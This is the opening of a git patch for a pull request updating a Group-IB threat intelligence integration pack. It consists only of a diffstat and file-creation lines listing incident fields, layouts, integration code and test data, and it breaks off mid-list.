From 9d7649412ae2e0fa8d60f2710ac17956c146fc38 Mon Sep 17 00:00:00 2001 
From: Kiriill Date: Thu, 30 Jan 2025 14:16:20 +0500 Subject: [PATCH 1/9] Update Group-IB Threat Intelligence Pack (#37239) --- .../.pack-ignore | 36 +- .../.secrets-ignore | 5 +- ...oup-IB_Threat_Intelligence_classifier.json | 26 +- ...r-Group-IB_Threat_Intelligence_mapper.json | 2443 +- .../incidentfield-CPE_Table.json | 33 + .../incidentfield-GIB_Address.json | 9 +- .../incidentfield-GIB_Admiralty_Code.json | 48 +- ...dentfield-GIB_Affected_Software_Table.json | 80 + .../incidentfield-GIB_Bulletin_Family.json | 34 + .../IncidentFields/incidentfield-GIB_CNC.json | 37 + .../incidentfield-GIB_CNC_Domain.json | 37 + .../incidentfield-GIB_CNC_Port.json | 37 + .../incidentfield-GIB_CNC_URL.json | 38 + .../incidentfield-GIB_CPE_Table.json | 119 + .../incidentfield-GIB_CVSS_Score.json | 34 + .../incidentfield-GIB_CVSS_Vector.json | 34 + .../IncidentFields/incidentfield-GIB_CVV.json | 7 +- .../incidentfield-GIB_Card_Issuer.json | 11 +- .../incidentfield-GIB_Card_Number.json | 11 +- .../incidentfield-GIB_Card_Type.json | 11 +- .../incidentfield-GIB_Card_Valid_Thru.json | 7 +- ...incidentfield-GIB_Compromised_Account.json | 36 + ..._Compromised_Events_Information_Table.json | 231 + ...entfield-GIB_Compromised_Events_Table.json | 171 + .../incidentfield-GIB_Compromised_Login.json | 11 +- .../incidentfield-GIB_Country_Code.json | 34 + .../incidentfield-GIB_Country_Name.json | 34 + .../incidentfield-GIB_Credibility.json | 48 +- ...entfield-GIB_Cybercriminal_Expertises.json | 36 + ...tfield-GIB_Cybercriminal_Forums_Table.json | 67 + ...cidentfield-GIB_Cybercriminal_Malware.json | 34 + ...cidentfield-GIB_Cybercriminal_Regions.json | 36 + ...cidentfield-GIB_Cybercriminal_Sectors.json | 36 + ...IB_Cybercriminal_Threat_Actor_Aliases.json | 34 + ...ybercriminal_Threat_Actor_Description.json | 34 + ...rcriminal_Threat_Actor_Report_Authors.json | 34 + ...ercriminal_Threat_Actor_Reports_Table.json | 80 + ...-GIB_Cybercriminal_Threat_Description.json | 34 + 
...tfield-GIB_Cybercriminal_Threat_Title.json | 34 + .../incidentfield-GIB_DDOS_Date_Begin.json | 34 + .../incidentfield-GIB_DDOS_Date_End.json | 34 + ...identfield-GIB_DDOS_Date_Registration.json | 34 + .../incidentfield-GIB_DDOS_Duration.json | 34 + .../incidentfield-GIB_DDOS_Protocol.json | 34 + .../incidentfield-GIB_DDOS_Request_Body.json | 34 + ...identfield-GIB_DDOS_Request_Body_Hash.json | 34 + ...identfield-GIB_DDOS_Request_Data_Link.json | 34 + ...ntfield-GIB_DDOS_Request_Headers_Body.json | 34 + ...ntfield-GIB_DDOS_Request_Headers_Hash.json | 34 + .../incidentfield-GIB_DDOS_Source.json | 34 + .../incidentfield-GIB_DDOS_Target_ASN.json | 34 + ...ncidentfield-GIB_DDOS_Target_Category.json | 34 + .../incidentfield-GIB_DDOS_Target_City.json | 34 + ...entfield-GIB_DDOS_Target_Country_Code.json | 34 + ...entfield-GIB_DDOS_Target_Country_Name.json | 34 + .../incidentfield-GIB_DDOS_Target_Domain.json | 37 + .../incidentfield-GIB_DDOS_Target_IP.json | 34 + .../incidentfield-GIB_DDOS_Target_Port.json | 34 + ...ncidentfield-GIB_DDOS_Target_Provider.json | 34 + .../incidentfield-GIB_DDOS_Target_Region.json | 34 + .../incidentfield-GIB_DDOS_Target_URL.json | 37 + .../incidentfield-GIB_DDOS_Type.json | 34 + .../incidentfield-GIB_Data_Hash.json | 15 +- .../incidentfield-GIB_Date_Add.json | 34 + .../incidentfield-GIB_Date_Compromised.json | 8 +- .../incidentfield-GIB_Date_Created.json | 13 +- .../incidentfield-GIB_Date_Created_At.json | 40 + .../incidentfield-GIB_Date_Expired.json | 7 +- ...identfield-GIB_Date_First_Compromised.json | 36 + .../incidentfield-GIB_Date_First_Seen.json | 62 + .../incidentfield-GIB_Date_Incident.json | 34 + ...cidentfield-GIB_Date_Last_Compromised.json | 36 + .../incidentfield-GIB_Date_Last_Seen.json | 62 + .../incidentfield-GIB_Date_Modified.json | 34 + .../incidentfield-GIB_Date_Published.json | 36 + .../incidentfield-GIB_Date_Updated_At.json | 40 + .../incidentfield-GIB_Date_of_Detection.json | 24 +- 
.../incidentfield-GIB_Deface_Contacts.json | 34 + .../incidentfield-GIB_Deface_Date.json | 34 + .../incidentfield-GIB_Deface_Site_URL.json | 34 + .../incidentfield-GIB_Deface_Source.json | 34 + .../incidentfield-GIB_Downloaded_From.json | 13 +- ...cidentfield-GIB_Downloaded_From_Table.json | 106 + .../incidentfield-GIB_Drop_Email.json | 7 +- .../incidentfield-GIB_Drop_Email_Domain.json | 7 +- .../incidentfield-GIB_Email.json | 10 +- .../incidentfield-GIB_Email_Domains.json | 33 + .../incidentfield-GIB_Emails.json | 33 + .../incidentfield-GIB_Extended_CVSS_Base.json | 34 + ...ield-GIB_Extended_CVSS_Exploitability.json | 34 + ...ncidentfield-GIB_Extended_CVSS_Impact.json | 34 + ...cidentfield-GIB_Extended_CVSS_Overall.json | 34 + ...identfield-GIB_Extended_CVSS_Temporal.json | 34 + ...ncidentfield-GIB_Extended_Description.json | 34 + .../incidentfield-GIB_Favicon.json | 7 +- .../incidentfield-GIB_GIT_Source.json | 36 + .../incidentfield-GIB_HTML.json | 7 +- .../incidentfield-GIB_Has_Exploit.json | 34 + .../incidentfield-GIB_Href.json | 34 + .../IncidentFields/incidentfield-GIB_ID.json | 55 +- .../incidentfield-GIB_Inject_Dump.json | 7 +- .../incidentfield-GIB_Inject_MD5.json | 6 +- .../incidentfield-GIB_Is_Tailored.json | 36 + .../incidentfield-GIB_Leak_Name.json | 7 +- .../incidentfield-GIB_Leak_Published.json | 33 + .../incidentfield-GIB_Leaked_Data.json | 7 +- .../incidentfield-GIB_Leaked_File_Name.json | 6 +- .../incidentfield-GIB_Link_List_Table.json | 132 + .../incidentfield-GIB_Malware_Aliases.json | 34 + .../incidentfield-GIB_Malware_CNC_Domain.json | 34 + .../incidentfield-GIB_Malware_Categories.json | 34 + ...incidentfield-GIB_Malware_Description.json | 34 + .../incidentfield-GIB_Malware_File_hash.json | 34 + .../incidentfield-GIB_Malware_Langs.json | 34 + .../incidentfield-GIB_Malware_Name.json | 15 +- .../incidentfield-GIB_Malware_Platforms.json | 34 + .../incidentfield-GIB_Malware_Regions.json | 34 + ...ntfield-GIB_Malware_Short_Description.json | 34 + 
...entfield-GIB_Malware_Source_Countries.json | 34 + .../incidentfield-GIB_Malware_Table.json | 67 + .../incidentfield-GIB_Matches_Table.json | 81 + .../incidentfield-GIB_Merged_Cvss.json | 34 + .../incidentfield-GIB_Mirror_Link.json | 34 + .../incidentfield-GIB_Name_Servers.json | 7 +- ...tion-State_Cybercriminal_Forums_Table.json | 67 + ...ation-State_Cybercriminals_Expertises.json | 34 + ...B_Nation-State_Cybercriminals_Malware.json | 34 + ...B_Nation-State_Cybercriminals_Regions.json | 34 + ...B_Nation-State_Cybercriminals_Sectors.json | 34 + ...e_Cybercriminals_Threat_Actor_Aliases.json | 35 + ...State_Cybercriminals_Threat_Actor_CVE.json | 34 + ...e_Cybercriminals_Threat_Actor_Country.json | 34 + ...bercriminals_Threat_Actor_Description.json | 34 + ...ate_Cybercriminals_Threat_Actor_Goals.json | 34 + ...te_Cybercriminals_Threat_Actor_Labels.json | 36 + ...rcriminals_Threat_Actor_Reports_Table.json | 80 + ...ate_Cybercriminals_Threat_Actor_Roles.json | 34 + ...State_Cybercriminals_Threat_Countries.json | 34 + ...ate_Cybercriminals_Threat_Description.json | 34 + ...tate_Cybercriminals_Threat_Expertises.json | 34 + ...ion-State_Cybercriminals_Threat_Langs.json | 34 + ...n-State_Cybercriminals_Threat_Regions.json | 34 + ...e_Cybercriminals_Threat_Report_Number.json | 34 + ...n-State_Cybercriminals_Threat_Sectors.json | 34 + ...ion-State_Cybercriminals_Threat_Title.json | 34 + ...ld-GIB_OSI_Git_Repository_Files_Table.json | 158 + .../incidentfield-GIB_Organization_BIC.json | 34 + .../incidentfield-GIB_Organization_BSB.json | 34 + .../incidentfield-GIB_Organization_CLABE.json | 34 + .../incidentfield-GIB_Organization_IBAN.json | 34 + .../incidentfield-GIB_Organization_Name.json | 34 + .../incidentfield-GIB_Organization_SWIFT.json | 34 + ...incidentfield-GIB_Parsed_Login_Domain.json | 34 + .../incidentfield-GIB_Parsed_Login_IP.json | 34 + .../incidentfield-GIB_Password.json | 12 +- .../incidentfield-GIB_Passwords.json | 33 + .../incidentfield-GIB_Payment_System.json 
| 11 +- .../incidentfield-GIB_Person.json | 9 +- .../incidentfield-GIB_Phishing_Brand.json | 37 + ...incidentfield-GIB_Phishing_Date_Added.json | 34 + ...cidentfield-GIB_Phishing_Date_Blocked.json | 11 +- ...identfield-GIB_Phishing_Date_Detected.json | 34 + ...cidentfield-GIB_Phishing_Date_Updated.json | 35 + .../incidentfield-GIB_Phishing_Domain.json | 13 +- ...d-GIB_Phishing_Domain_Expiration_Date.json | 37 + ...ncidentfield-GIB_Phishing_Domain_Puny.json | 37 + .../incidentfield-GIB_Phishing_IP_Table.json | 94 + .../incidentfield-GIB_Phishing_Kit_Email.json | 33 + ...incidentfield-GIB_Phishing_Kit_Emails.json | 7 +- .../incidentfield-GIB_Phishing_Kit_Hash.json | 7 +- .../incidentfield-GIB_Phishing_Kit_Path.json | 34 + ...incidentfield-GIB_Phishing_Kit_Source.json | 36 + .../incidentfield-GIB_Phishing_Kit_Table.json | 70 + ...incidentfield-GIB_Phishing_Objectives.json | 37 + .../incidentfield-GIB_Phishing_Registrar.json | 34 + .../incidentfield-GIB_Phishing_Sources.json | 36 + .../incidentfield-GIB_Phishing_Status.json | 8 +- .../incidentfield-GIB_Phishing_Type.json | 7 +- .../incidentfield-GIB_Phishing_URLs.json | 37 + .../incidentfield-GIB_Portal_Link.json | 53 +- .../incidentfield-GIB_Provider_Domain.json | 34 + .../incidentfield-GIB_Proxy_Port.json | 34 + .../incidentfield-GIB_Proxy_Source.json | 34 + .../incidentfield-GIB_Proxy_Sources.json | 34 + .../incidentfield-GIB_Proxy_Type.json | 34 + ...dentfield-GIB_Related_Indicators_Data.json | 62 +- .../incidentfield-GIB_Reliability.json | 48 +- .../incidentfield-GIB_Report_Number.json | 34 + .../incidentfield-GIB_Reporter.json | 34 + .../incidentfield-GIB_Repository.json | 7 +- .../incidentfield-GIB_Scanner_Categories.json | 34 + .../incidentfield-GIB_Scanner_Sources.json | 35 + .../incidentfield-GIB_Screenshot.json | 7 +- .../incidentfield-GIB_Service_Domain.json | 34 + .../incidentfield-GIB_Service_IP.json | 34 + .../incidentfield-GIB_Service_URL.json | 37 + .../incidentfield-GIB_Severity.json | 46 +- 
.../incidentfield-GIB_Socks_Proxy_Source.json | 33 + .../incidentfield-GIB_Source.json | 54 +- .../incidentfield-GIB_Target_ASN.json | 34 + .../incidentfield-GIB_Target_Brand.json | 8 +- .../incidentfield-GIB_Target_Category.json | 7 +- .../incidentfield-GIB_Target_City.json | 34 + .../incidentfield-GIB_Target_Domain.json | 11 +- ...identfield-GIB_Target_Domain_Provider.json | 34 + .../incidentfield-GIB_Target_IP.json | 34 + .../incidentfield-GIB_Target_Provider.json | 34 + .../incidentfield-GIB_Target_Region.json | 34 + ...ncidentfield-GIB_Threat_Actor_Country.json | 36 + .../incidentfield-GIB_Threat_Actor_ID.json | 21 +- .../incidentfield-GIB_Threat_Actor_Name.json | 25 +- ...incidentfield-GIB_Threat_Actor_is_APT.json | 25 +- ...incidentfield-GIB_Threat_Actors_Table.json | 65 + .../incidentfield-GIB_Threat_Level.json | 34 + .../incidentfield-GIB_Title.json | 8 +- .../incidentfield-GIB_Update_Time.json | 33 + .../incidentfield-GIB_Upload_Time.json | 33 + .../incidentfield-GIB_VPN_Names.json | 34 + .../incidentfield-GIB_VPN_Sources.json | 34 + .../incidentfield-GIB_Victim_IP.json | 7 +- .../incidentfield-GIB_Vulnerability_Type.json | 34 + .../incidenttype-GIB_APT_Threat.json | 34 + .../incidenttype-GIB_Attacks_DDOS.json | 34 + .../incidenttype-GIB_Attacks_Deface.json | 34 + ...cidenttype-GIB_Attacks_Phishing_Group.json | 34 + ...incidenttype-GIB_Attacks_Phishing_Kit.json | 34 + ...enttype-GIB_Brand_Protection_Phishing.json | 4 +- ...ype-GIB_Brand_Protection_Phishing_Kit.json | 6 +- .../incidenttype-GIB_Compromised_Account.json | 6 +- ...enttype-GIB_Compromised_Account_Group.json | 34 + .../incidenttype-GIB_Compromised_Card.json | 6 +- ...cidenttype-GIB_Compromised_Card_Group.json | 34 + .../incidenttype-GIB_Compromised_Mule.json | 34 + ...incidenttype-GIB_Cybercriminal_Threat.json | 34 + ...nttype-GIB_Cybercriminal_Threat_Actor.json | 34 + .../incidenttype-GIB_Data_Breach.json | 14 +- .../incidenttype-GIB_Malware.json | 34 + .../incidenttype-GIB_Malware_CNC.json | 
36 + ...IB_Nation-State_Cybercriminals_Threat.json | 34 + ...ion-State_Cybercriminals_Threat_Actor.json | 34 + .../incidenttype-GIB_OSI_Git_Leak.json | 16 +- .../incidenttype-GIB_OSI_Public_Leak.json | 16 +- .../incidenttype-GIB_OSI_Vulnerability.json | 34 + ...denttype-GIB_Suspicious_IP_Open_Proxy.json | 34 + ...ncidenttype-GIB_Suspicious_IP_Scanner.json | 34 + ...enttype-GIB_Suspicious_IP_Socks_Proxy.json | 34 + ...cidenttype-GIB_Suspicious_IP_TOR_Node.json | 34 + .../incidenttype-GIB_Suspicious_IP_VPN.json | 34 + .../incidenttype-GIB_Targeted_Malware.json | 6 +- .../indicatorfield-GIB_Admiralty_Code.json | 3 +- .../indicatorfield-GIB_Collection.json | 1 - .../indicatorfield-GIB_Credibility.json | 3 +- .../indicatorfield-GIB_Hash.json | 30 + .../indicatorfield-GIB_ID.json | 3 +- .../indicatorfield-GIB_Malware_Name.json | 1 - .../indicatorfield-GIB_Proxy_Anonymous.json | 2 +- .../indicatorfield-GIB_Reliability.json | 3 +- .../indicatorfield-GIB_Severity.json | 3 +- .../indicatorfield-GIB_Threat_Actor_ID.json | 1 - .../indicatorfield-GIB_Threat_Actor_Name.json | 1 - ...ndicatorfield-GIB_Threat_Actor_is_APT.json | 1 - .../reputation-GIB_Compromised_IMEI.json | 2 +- .../reputation-GIB_Compromised_Mule.json | 2 +- .../reputation-GIB_Victim_IP.json | 2 +- .../Integrations/GroupIBTIA/GroupIBTIA.py | 3279 ++- .../Integrations/GroupIBTIA/GroupIBTIA.yml | 665 +- .../GroupIBTIA/GroupIBTIA_test.py | 516 +- .../Integrations/GroupIBTIA/README.md | 27 +- .../GroupIBTIA/command_examples.txt | 22 +- .../avalible_collections_example.json | 37 + .../GroupIBTIA/test_data/example.json | 684 - .../test_data/main_collections_examples.json | 11155 +++++++++ .../GroupIBTIA/test_data/results.json | 91 - .../GroupIBTIA/test_data/search_example.json | 42 + .../GroupIB_TIA_Feed/GroupIB_TIA_Feed.py | 2107 +- .../GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml | 19 +- .../GroupIB_TIA_Feed/GroupIB_TIA_Feed_test.py | 157 +- .../GroupIB_TIA_Feed/command_examples.txt | 2 +- 
.../avalible_collections_example.json | 38 + .../GroupIB_TIA_Feed/test_data/example.json | 713 - .../test_data/main_collections_examples.json | 19588 ++++++++++++++++ .../GroupIB_TIA_Feed/test_data/results.json | 587 - ...ayoutscontainer-GIB_APT_Threat_Layout.json | 392 + ...outscontainer-GIB_Attacks_DDOS_Layout.json | 758 + ...tscontainer-GIB_Attacks_Deface_Layout.json | 618 + ...ner-GIB_Attacks_Phishing_Group_Layout.json | 598 + ...ainer-GIB_Attacks_Phishing_Kit_Layout.json | 493 + ..._Brand_Protection_Phishing_Kit_Layout.json | 6 +- ...-GIB_Brand_Protection_Phishing_Layout.json | 6 +- ...-GIB_Compromised_Account_Group_Layout.json | 1647 ++ ...tainer-GIB_Compromised_Account_Layout.json | 7 +- ...ner-GIB_Compromised_Card_Group_Layout.json | 582 + ...container-GIB_Compromised_Card_Layout.json | 7 +- ...container-GIB_Compromised_IMEI_Layout.json | 2 +- ...container-GIB_Compromised_Mule_Layout.json | 465 +- ...GIB_Cybercriminal_Threat_Actor_Layout.json | 529 + ...ainer-GIB_Cybercriminal_Threat_Layout.json | 591 + ...youtscontainer-GIB_Data_Breach_Layout.json | 153 +- ...youtscontainer-GIB_Malware_CNC_Layout.json | 442 + .../layoutscontainer-GIB_Malware_Layout.json | 496 + ...te_Cybercriminals_Threat_Actor_Layout.json | 561 + ...on-State_Cybercriminals_Threat_Layout.json | 643 + ...outscontainer-GIB_OSI_Git_Leak_Layout.json | 160 +- ...scontainer-GIB_OSI_Public_Leak_Layout.json | 163 +- ...ontainer-GIB_OSI_Vulnerability_Layout.json | 652 + ...r-GIB_Suspicious_IP_Open_Proxy_Layout.json | 489 + ...iner-GIB_Suspicious_IP_Scanner_Layout.json | 451 + ...-GIB_Suspicious_IP_Socks_Proxy_Layout.json | 460 + ...ner-GIB_Suspicious_IP_TOR_Node_Layout.json | 442 + ...ontainer-GIB_Suspicious_IP_VPN_Layout.json | 460 + ...container-GIB_Targeted_Malware_Layout.json | 6 +- ...layoutscontainer-GIB_Victim_IP_Layout.json | 2 +- ...IB_Threat_Intelligence_and_Attribution.yml | 9 +- ...eat_Intelligence_and_Attribution_README.md | 8 + ...-e506-4bcb-8ee5-fe5fb30e72d8-gib_rule.json | 89 + 
.../README.md | 1 + .../ReleaseNotes/2_0_0.md | 620 + .../GIBIncidentUpdate/GIBIncidentUpdate.yml | 2 +- .../Scripts/GIBIncidentUpdate/README.md | 6 +- .../GIBIncidentUpdateIncludingClosed.yml | 2 +- .../README.md | 6 +- ...Threat_Intelligence_&_Attribution-Test.yml | 50 +- .../pack_metadata.json | 2 +- 323 files changed, 57539 insertions(+), 6314 deletions(-) create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-CPE_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Affected_Software_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Bulletin_Family.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_Domain.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_Port.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CNC_URL.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CPE_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVSS_Score.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVSS_Vector.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Account.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Events_Information_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Events_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Country_Code.json create mode 
100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Country_Name.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Expertises.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Forums_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Malware.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Regions.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Sectors.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Aliases.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Description.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Report_Authors.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Reports_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Description.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Title.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_Begin.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_End.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_Registration.json create mode 100644 
Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Duration.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Protocol.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Body.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Body_Hash.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Data_Link.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Headers_Body.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Headers_Hash.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Source.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_ASN.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Category.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_City.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Country_Code.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Country_Name.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Domain.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_IP.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Port.json create mode 100644 
Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Provider.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Region.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_URL.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Type.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Add.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Created_At.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_First_Compromised.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_First_Seen.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Incident.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Last_Compromised.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Last_Seen.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Modified.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Published.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Updated_At.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Contacts.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Date.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Site_URL.json create mode 100644 
Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Source.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Downloaded_From_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Email_Domains.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Emails.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Base.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Exploitability.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Impact.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Overall.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Temporal.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_Description.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_GIT_Source.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Has_Exploit.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Href.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Is_Tailored.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Leak_Published.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Link_List_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Aliases.json create mode 100644 
Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_CNC_Domain.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Categories.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Description.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_File_hash.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Langs.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Platforms.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Regions.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Short_Description.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Source_Countries.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Malware_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Matches_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Merged_Cvss.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Mirror_Link.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminal_Forums_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Expertises.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Malware.json create mode 100644 
